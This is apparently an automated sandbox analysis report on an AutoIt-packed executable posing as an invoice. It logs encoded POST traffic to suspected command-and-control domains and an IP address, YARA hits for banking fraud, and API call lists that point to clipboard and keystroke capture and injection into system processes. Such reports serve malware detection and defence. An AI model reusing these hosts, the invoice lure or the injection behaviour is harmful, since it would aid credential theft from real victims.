                Source: unknown | HTTP traffic detected: POST /79tr/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9 | Host: www.beingandbecoming.ltd | Connection: close | Content-Type: application/x-www-form-urlencoded | Content-Length: 208 | Cache-Control: no-cache | Origin: http://www.beingandbecoming.ltd | Referer: http://www.beingandbecoming.ltd/79tr/ | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 | Data Ascii: yX7=iDQU2KTRHkQI8t2cVUngG3m7Cbh39WPIR62w/UmKbEifvoZyYK8H8VhoyidY1cIhdLAluW0Ti8nUeXpQYb9N8x9cKCJtKYDPBk2cM7yh4eUR6+q7t2BRJHcPLc/6s84qlA4wOmsg0CJyQOMcn8URMiRVMOADK0ZgW5+GY6Wu6prm+hdKyM6GZrd48brJRAx28Ef5BCTwh7Gz
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 12:45:35 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 12:45:38 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 12:45:40 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 12:45:43 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: tOxaspWNamv.exe, 0000000E.00000002.3408793565.0000000000DE4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mcfunding.org
                Source: tOxaspWNamv.exe, 0000000E.00000002.3408793565.0000000000DE4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mcfunding.org/0598/
                Source: ktmutil.exe, 0000000B.00000002.3412669118.0000000003BE4000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3414389532.0000000005FE0000.00000004.00000800.00020000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409897296.0000000002A74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2799096462.0000000017A24000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://34.92.79.175:19817
                Source: ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ktmutil.exe, 0000000B.00000002.3412669118.0000000003BE4000.00000004.10000000.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409897296.0000000002A74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2799096462.0000000017A24000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?cf95fa39f4a72ce6b85bbfbe9eadb95a
                Source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: ktmutil.exe, 0000000B.00000003.2689118508.0000000007A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00246B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_00246B0C
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00246D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00246D07
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00246B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_00246B0C
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00232B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,2_2_00232B37
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0025F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0025F7FF

                E-Banking Fraud

                Source: Yara matchFile source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3408793565.0000000000D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2493193897.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2493863404.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3397246670.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2492860834.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3409182554.0000000004790000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3409416368.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3409702511.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: This is a third-party compiled AutoIt script.2_2_001F3D19
                Source: ORIGINAL INVOICE COAU7230734290.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000000.2140082625.000000000029E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f4950a80-c
                Source: ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000000.2140082625.000000000029E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: "SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_266746b7-5
                Source: ORIGINAL INVOICE COAU7230734290.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7c3df3d5-6
                Source: ORIGINAL INVOICE COAU7230734290.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_48c0b361-0
                Source: initial sampleStatic PE information: Filename: ORIGINAL INVOICE COAU7230734290.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0042C883 NtClose,4_2_0042C883
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72B60 NtClose,LdrInitializeThunk,4_2_03A72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03A72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03A72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A735C0 NtCreateMutant,LdrInitializeThunk,4_2_03A735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A74340 NtSetContextThread,4_2_03A74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A74650 NtSuspendThread,4_2_03A74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72BA0 NtEnumerateValueKey,4_2_03A72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72B80 NtQueryInformationFile,4_2_03A72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72BE0 NtQueryValueKey,4_2_03A72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72BF0 NtAllocateVirtualMemory,4_2_03A72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72AB0 NtWaitForSingleObject,4_2_03A72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72AF0 NtWriteFile,4_2_03A72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72AD0 NtReadFile,4_2_03A72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72FA0 NtQuerySection,4_2_03A72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72FB0 NtResumeThread,4_2_03A72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72F90 NtProtectVirtualMemory,4_2_03A72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72FE0 NtCreateFile,4_2_03A72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72F30 NtCreateSection,4_2_03A72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72F60 NtCreateProcessEx,4_2_03A72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72EA0 NtAdjustPrivilegesToken,4_2_03A72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72E80 NtReadVirtualMemory,4_2_03A72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72EE0 NtQueueApcThread,4_2_03A72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72E30 NtWriteVirtualMemory,4_2_03A72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72DB0 NtEnumerateKey,4_2_03A72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72DD0 NtDelayExecution,4_2_03A72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72D30 NtUnmapViewOfSection,4_2_03A72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72D00 NtSetInformationFile,4_2_03A72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72D10 NtMapViewOfSection,4_2_03A72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72CA0 NtQueryInformationToken,4_2_03A72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72CF0 NtOpenProcess,4_2_03A72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72CC0 NtQueryVirtualMemory,4_2_03A72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72C00 NtQueryInformationProcess,4_2_03A72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72C60 NtCreateKey,4_2_03A72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A73090 NtSetValueKey,4_2_03A73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A73010 NtOpenDirectoryObject,4_2_03A73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A739B0 NtGetContextThread,4_2_03A739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A73D10 NtOpenProcessToken,4_2_03A73D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A73D70 NtOpenThread,4_2_03A73D70
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03244340 NtSetContextThread,LdrInitializeThunk,11_2_03244340
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03244650 NtSuspendThread,LdrInitializeThunk,11_2_03244650
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242B60 NtClose,LdrInitializeThunk,11_2_03242B60
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_03242BA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242BE0 NtQueryValueKey,LdrInitializeThunk,11_2_03242BE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03242BF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242AF0 NtWriteFile,LdrInitializeThunk,11_2_03242AF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242AD0 NtReadFile,LdrInitializeThunk,11_2_03242AD0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242F30 NtCreateSection,LdrInitializeThunk,11_2_03242F30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242FB0 NtResumeThread,LdrInitializeThunk,11_2_03242FB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242FE0 NtCreateFile,LdrInitializeThunk,11_2_03242FE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_03242E80
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242EE0 NtQueueApcThread,LdrInitializeThunk,11_2_03242EE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_03242D30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242D10 NtMapViewOfSection,LdrInitializeThunk,11_2_03242D10
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_03242DF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242DD0 NtDelayExecution,LdrInitializeThunk,11_2_03242DD0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242C60 NtCreateKey,LdrInitializeThunk,11_2_03242C60
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_03242C70
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_03242CA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032435C0 NtCreateMutant,LdrInitializeThunk,11_2_032435C0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_032439B0 NtGetContextThread,LdrInitializeThunk,11_2_032439B0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242B80 NtQueryInformationFile,11_2_03242B80
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242AB0 NtWaitForSingleObject,11_2_03242AB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242F60 NtCreateProcessEx,11_2_03242F60
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242FA0 NtQuerySection,11_2_03242FA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242F90 NtProtectVirtualMemory,11_2_03242F90
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242E30 NtWriteVirtualMemory,11_2_03242E30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242EA0 NtAdjustPrivilegesToken,11_2_03242EA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242D00 NtSetInformationFile,11_2_03242D00
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242DB0 NtEnumerateKey,11_2_03242DB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242C00 NtQueryInformationProcess,11_2_03242C00
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242CF0 NtOpenProcess,11_2_03242CF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03242CC0 NtQueryVirtualMemory,11_2_03242CC0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03243010 NtOpenDirectoryObject,11_2_03243010
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03243090 NtSetValueKey,11_2_03243090
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03243D10 NtOpenProcessToken,11_2_03243D10
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_03243D70 NtOpenThread,11_2_03243D70
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_027A9280 NtCreateFile,11_2_027A9280
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_027A93F0 NtReadFile,11_2_027A93F0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_027A9700 NtAllocateVirtualMemory,11_2_027A9700
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_027A94F0 NtDeleteFile,11_2_027A94F0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 11_2_027A95A0 NtClose,11_2_027A95A0
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00236606: CreateFileW,DeviceIoControl,CloseHandle,2_2_00236606
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0022ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,2_2_0022ACC5
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002379D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_002379D3
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0021B0432_2_0021B043
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002032002_2_00203200
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00203B702_2_00203B70
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0022410F2_2_0022410F
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002102A42_2_002102A4
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0022038E2_2_0022038E
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_001FE3B02_2_001FE3B0
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0022467F2_2_0022467F
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002106D92_2_002106D9
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0025AACE2_2_0025AACE
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00224BEF2_2_00224BEF
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0021CCC12_2_0021CCC1
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_001F6F072_2_001F6F07
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_001FAF502_2_001FAF50
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0020B11F2_2_0020B11F
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0021D1B92_2_0021D1B9
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002531BC2_2_002531BC
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0021123A2_2_0021123A
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0022724D2_2_0022724D
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002313CA2_2_002313CA
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_001F93F02_2_001F93F0
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0020F5632_2_0020F563
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_001F96C02_2_001F96C0
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0023B6CC2_2_0023B6CC
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_001F77B02_2_001F77B0
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0025F7FF2_2_0025F7FF
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002279C92_2_002279C9
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_0020FA57
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_001F9B60
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_001F7D19
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_0020FE6F
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_00219ED0
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_001F7FA3
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_00E28148
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004188F3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_00403060
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004010C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004101CA
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004101D3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_00401200
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0040235D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_00402360
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_00416B33
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004103F3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_00402B95
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_00402BA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0040E46B
